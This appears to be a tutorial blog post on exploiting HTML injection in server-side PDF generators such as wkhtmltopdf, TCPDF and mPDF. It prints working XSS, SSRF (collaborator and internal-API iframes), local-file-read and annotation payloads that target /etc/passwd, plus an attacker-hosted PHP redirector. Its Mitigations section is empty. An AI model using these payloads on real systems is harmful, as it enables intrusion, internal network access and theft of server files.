AI Created Image
Today, I want to discuss an advanced topic concerning PDF generation in applications and the critical vulnerabilities associated with it. You’re all familiar with this well-known common vulnerability, but I just wanted to share it with you.
Most of the web applications provide a PDF generation features, commonly used for invoices or reports, which often incorporate dynamic user input. In this we will discuss the misconfigurations and vulnerability that can lead to critical security vulnerabilities. It’s basically caused by HTML injection in the user input that is processed by PDF generation libraries.
Let's talk about PDF!
PDF — Portable Document Format is a widely used format designed for platform-independent document display. PDF files are widely used for many applications. Many web applications incorporate PDF generation capabilities, typically through external libraries or plugins.
However, vulnerabilities can arise due to misconfigurations, insufficient security settings, or outdated versions of these libraries, often allowing attackers to exploit unsanitized malicious input.
Here are a few PDF generation libraries commonly used in web applications:
Web applications often need to control the layout of generated PDF files, so these libraries take HTML as input and use it to produce the final PDF. This enables the application to manage the PDF’s design through CSS within the HTML. These libraries operate by parsing the HTML, rendering it, and then converting it into a PDF.
TCPDF is a popular open-source PHP library used to generate PDF documents programmatically. It is known for its ability to convert HTML and CSS into a PDF file without requiring any external extensions. Below is an overview of how TCPDF works, followed by some example code to illustrate its usage
Since TCPDF can take HTML as input to generate PDF files, if the application allows untrusted user input to be included in the HTML without proper sanitization, it can lead to HTMLInjection. Attackers could inject malicious HTML, which may result in xss and html injection.
$html = '<h1>' . $_GET['title'] . '</h1>'; // Vulnerable, unsanitized user input $pdf->writeHTML($html);
If an attacker passes a script tag in the title parameter (<script>alert('XSS')</script>), the generated PDF could contain harmful code. If the user input is not sanitized it will directly renter or exedute in the PDF.
Another example: wkhtmltopdf
Wkhtmltopdf is an open-source command-line tool that converts HTML to PDF using the WebKit rendering engine, which is also used in web browsers. It renders HTML pages into PDF with support for CSS, JavaScript, and even images. It is often used in server-side environments to generate PDFs from HTML templates.
Avoid using wkhtmltopdf with untrusted HTML content. Always sanitize user-provided HTML or JavaScript, as failure to do so may result in a complete server compromise!
Setting up and installation you can refer online documents.
After downloading wkhtmltopdf, we can install it using the following command on Debian-based Linux distributions:
[!bash!]$ sudo dpkg -i wkhtmltox_0.12.6.1-2.bullseye_amd64.deb
Running wkhtmltopdf with the -h option will display the tool's help information:
[!bash!]$ wkhtmltopdf -h
Name:
wkhtmltopdf 0.12.6.1 (with patched qt)
Synopsis:
wkhtmltopdf [GLOBAL OPTION]... [OBJECT]... <output file>
<SNIP>
When providing a URL to wkhtmltopdf, it will automatically fetch the website and convert it to a PDF:
[!bash!]$ wkhtmltopdf https://application.com/ thisfile.pdf
Loading pages (1/6)
Counting pages (2/6)
Resolving links (4/6)
Loading headers and footers (5/6)
Printing pages (6/6) Done
By examining the generated PDF, we can still identify the application website, though it has been resized to fit the PDF pages.
Here’s how you can use wkhtmltopdf from the command line to convert an HTML file to a PDF.
$wkhtmltopdf input.html output.pdf
This command takes an HTML file (input.html) and converts it into a PDF (output.pdf).
Additionally, we can supply the tool with a local HTML file to better simulate how a PDF generation library operates within a web application. For instance, consider the following HTML file:
We can now execute wkhtmltopdf on this HTML file to generate a corresponding PDF.
[!bash!]$ wkhtmltopdf ./index.html output.pdf
Loading pages (1/6)
Counting pages (2/6)
Resolving links (4/6)
Loading headers and footers (5/6)
Printing pages (6/6) Done
htb snippet
wkhtmltopdf tool will do converting HTML to PDF, and it can be easily integrated into web applications. It supports modern web technologies, making it ideal for generating rich PDFs from dynamic HTML content in server-side applications.
Here’s a simple real-world example of how a web application might generate a PDF receipt after a user submits a purchase form.
Example: Invoice PDF Generation
1. HTML Form (User Input)
Create a basic HTML form (purchase.html) where users can enter their details to generate a PDF invoice. This can be effortlessly accomplished with a PDF generation library. For instance, we can download an open-source invoice HTML template and use wkhtmltopdf to create a PDF invoice from the HTML code with its custom CSS. The resulting PDF will appear as follows:
Source: htb
We can even analyze the PDF files with different tools and can be utilized to identify specific vulnerabilities and misconfigurations.
Most of the library which we mentioned add some metadata information and we can utilize to identify the vulnerabilities.
To display the metadata we can use exiftool. You can refer the documentations for further options. It will display the Creator of pdf files.
e.g.:
user$ exiftool invoice.pdf
Creator: wkhtmltopdf 0.12.6.1
This information we can use for identify specific vulnerability for this particular version. Additionally, another tool is pdfinfo to perform same task.
Now let's move to the EXPLOITATION part.
We learned how PDF generation libraries function and how to identify them. After identifying the libraries, we can explore how to exploit the vulnerabilities that arise from misconfigurations. All of these vulnerabilities rely on inserting malicious user-provided content into the PDF generator’s input.
I have already shared a resource about hacking technique with PDF: Linkedin Post. This is an alternative method involving PDF uploads and exploitation, which you can review later.
Executing HTML Code
The basic test case we have to perform here is the injection of HTML code. This will occurs when an attacker injects malicious HTML into a web application’s PDF generation process. Many PDF generators, such as wkhtmltopdf, TCPDF, or similar libraries, allow HTML input to be converted into a PDF. If this input isn’t properly sanitized, attackers can exploit vulnerabilities by injecting harmful code.
How HTML Code Injection Happens:
Example Scenario:
A web application allows users to input HTML code to generate reports or invoices in PDF format. If the input isn’t sanitized, an attacker could submit the following:
<h1>test2</h1> <script>alert('PDF Exploit!')</script>
This code would be processed by the PDF generator, and if JavaScript is allowed in the resulting PDF, it would execute when opened, displaying an alert message. This is a simple example, but more complex exploits could involve stealing sensitive data or compromising the system.
By this we can inject JavaScript code as well to the PDF.
Executing JavaScript Code
Executing JavaScript code refers to the process of running JavaScript commands or scripts within a web browser or other JavaScript runtime environments which is PDF Generator.
Many PDF generation libraries like wkhtmltopdf or TCPDF allow HTML input and may execute embedded JavaScript within that input when generating the PDF.
JavaScript execution can occur in two primary ways:
When the PDF generation library processes HTML input, it may execute the injected JavaScript code. Moreover, since the PDF generation library operates on the server, the payload would also be executed on the server, making this type of vulnerability known as Server-Side XSS.
JavaScript execution in PDFs refers to the ability to embed and run JavaScript code within a PDF document. This can be enables more attack vectors. Basically we are looking for user maliciuous input which are directly enters in to the PDF files. The PDF generation library renders the HTML inputs and gets execute the malicious inserted JavaScript Code.
How JavaScript Code Execution Happens in PDF Generation
Example of JavaScript Injection in PDF Generation
Suppose a web application allows users to input text, which is then embedded into an HTML template for generating a PDF. An attacker could input the following malicious script:
<script>alert('PDF Attack!')</script>
<script>document.write('PDF Hacked')</script>
If this input is not properly sanitized and the PDF generator (e.g., wkhtmltopdf) processes it, the generated PDF will contain the embedded script. When opened in a vulnerable PDF viewer (like Adobe Reader), the JavaScript will execute, displaying the alert or string PDF Hacked will reflected in PDF.
This is a simple basic cross site scripting example. As a basic first exploit, let’s trigger an information disclosure that reveals a file path on the web server. This can be achieved with the following payload:
<script>document.write(window.location)</script>
If you run the above script in a PDF generator that accepts and processes HTML input, the behavior depends on several factors, including how the PDF generator handles JavaScript and whether JavaScript is enabled in the PDF viewer.
Server-Side Request Forgery
Server-Side Request Forgery (SSRF) in PDF Generators occurs when an attacker manipulates a PDF generator to make unauthorized requests on behalf of the server. This can lead to information disclosure, internal network scanning, or even compromise of internal services that are otherwise inaccessible.
SSRF vulnerabilities often arise in systems where external content (e.g., URLs or resources) is dynamically included in generated PDFs. Attackers exploit these vulnerabilities by injecting malicious URLs, tricking the server into fetching unintended resources.
To identify the SSRF we can try with different HTML tags to compel the server to initiate an HTTP request.
<img src="http:://csdflkjldkasȠlksdfldsf.oastify.com/testssrf1">
In a similar way, we can inject a stylesheet by using the link tag:
<link rel="stylesheet" href="http:://csdflkjldkasȠlksdfldsf.oastify.com/testssrf2" >
Typically, for images and stylesheets, the response does not appear in the generated PDF, resulting in a blind SSRF vulnerability that limits our ability to exploit it. However, depending on the (mis)configuration of the PDF generation library, we can inject other HTML elements that can initiate a request and cause the server to display the response. One such example is an iframe:
<iframe src="http://csdflkjldkasȠlksdfldsf.oastify.com/testssrf3"></iframe>
Injecting the three payloads and generating a PDF triggers three requests to our collaborator domains, successfully confirming SSRF with all three payloads.
We can verify this by checking the collaborator client and reviewing the output PDF file.
As a result, we have a regular SSRF vulnerability rather than a blind one, which is far more critical as it enables us to exfiltrate data more easily. For example, we can send a request to any internal endpoint and have the response displayed to us. Here’s how we can leak data from an internal API:
SSRF via External Resource Inclusion
If the PDF generator fetches external resources (such as images, stylesheets, or scripts) from user- provided URLs, an attacker can supply a malicious URL pointing to internal services.
<iframe src="http://127.0.0.1:8080/api/user" width="800" height="500"></iframe>
The generated PDF includes the response from the internal API, potentially exposing sensitive information that would otherwise be inaccessible from the outside:
Source htb labs
Local File Inclustion
Local File Inclusion (LFI) in a PDF generation web application occurs when an attacker can manipulate the input to the PDF generator to include or read files from the server’s file system. This vulnerability often arises when the web application does not properly sanitize user input, allowing the attacker to reference local files on the server.
There are several HTML elements we can attempt to inject in order to read local files on the server.
By executing JavaScript, if the server processes our injected script, we can utilize XMLHttpRequests and the file protocol to read local files, leading to a payload like this:
<script> x = new XMLHttpRequest(); x.onload = function(){ document.write(this.responseText) }; x.open("GET", "file:///etc/passwd"); x.send(); </script>
By injecting this JavaScript code, we can view the contents of the passwd file in the generated PDF:
However, this method can be impractical for certain files, as extracting data from the PDF may corrupt it. For example, syntax might break if we attempt to exfiltrate an SSH key. Additionally, files with binary data cannot be extracted in this manner. Therefore, we should base64-encode the file using the btoa function before including it in the PDF:
<script> x = new XMLHttpRequest(); x.onload = function(){ document.write(btoa(this.responseText)) }; x.open("GET", "file:///etc/passwd"); x.send(); </script>
However, this results in a single long line that may be truncated if it doesn’t fit on the PDF page, as the library usually doesn’t insert line breaks.
Source htb
This we can modify the payload to add line breaks every 100 characters to ensure it fits on the PDF page.
<script> function addNewlines(str) { var result = ''; while (str.length > 0) { result += str.substring(0, 100) + '\n'; str = str.substring(100); } return result; } x = new XMLHttpRequest(); x.onload = function(){ document.write(addNewlines(btoa(this.responseText))) }; x.open("GET", "file:///etc/passwd"); x.send(); </script>
After making these, we can retrieve the file successfully. The base64-encoded data can now be copied and decoded using any tool that ignores line breaks in the input.
In some cases if the backend not execute our injected JavaScript Code, we must have to run HTML tags to display local files.
Some payloads are below:
<iframe src="file:///etc/passwd" width="1000" height="500"></iframe>
<object data="file:///etc/passwd" width="1000" height="500">
<portal src="file:///etc/passwd" width="1000" height="500">
<img src="/etc/passwd" />
<img src="/var/log/apache2/access.log" />
<img src="C:\\windows\\system32\\drivers\\etc\\hosts" />
However, in our test environment, this only results in an empty iframe being displayed.
To display the contents of a file like /etc/passwd, you can use a different approach that involves redirecting the iframe's src to a controlled server which then fetches the local file. Here’s how you can do it:
Host an application in your localhost with below code
<?php header('Location: file://' . $_GET['url']); ?>
Then we can inject the below code in the application to get the successfull result
<iframe src="http://172.17.0.1:8000/redirector.php?url=%2fetc%2fpasswd" width="800" height="500"></iframe>
After this we will get the below output.
Souce htb
You can try more methods to for this LFI exploitation in PDF generators. Another interesting method is Critical in PDF Generation
PDF annotations are elements like comments, highlights, and attachments that can be added to a PDF. They can be used to include additional data or modify the document’s behavior.
If the application is using mPDF library for PDF Generators, it supports annotations via the
<annotations>
We can use annotations to append files to a generated PDF by injecting a payload such as the following:
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="mPDF" />
Examining the generated PDF file, we see an annotation with an attached file. Clicking on the attachment reveals the /etc/passwd file.
Source htb
Check the mPDF GitHub repository for any security updates related to annotations or content handling.
There are few other libraries that working the Annotations. You can check online.
Mitigations:
Subscribe to our newsletter and stay updated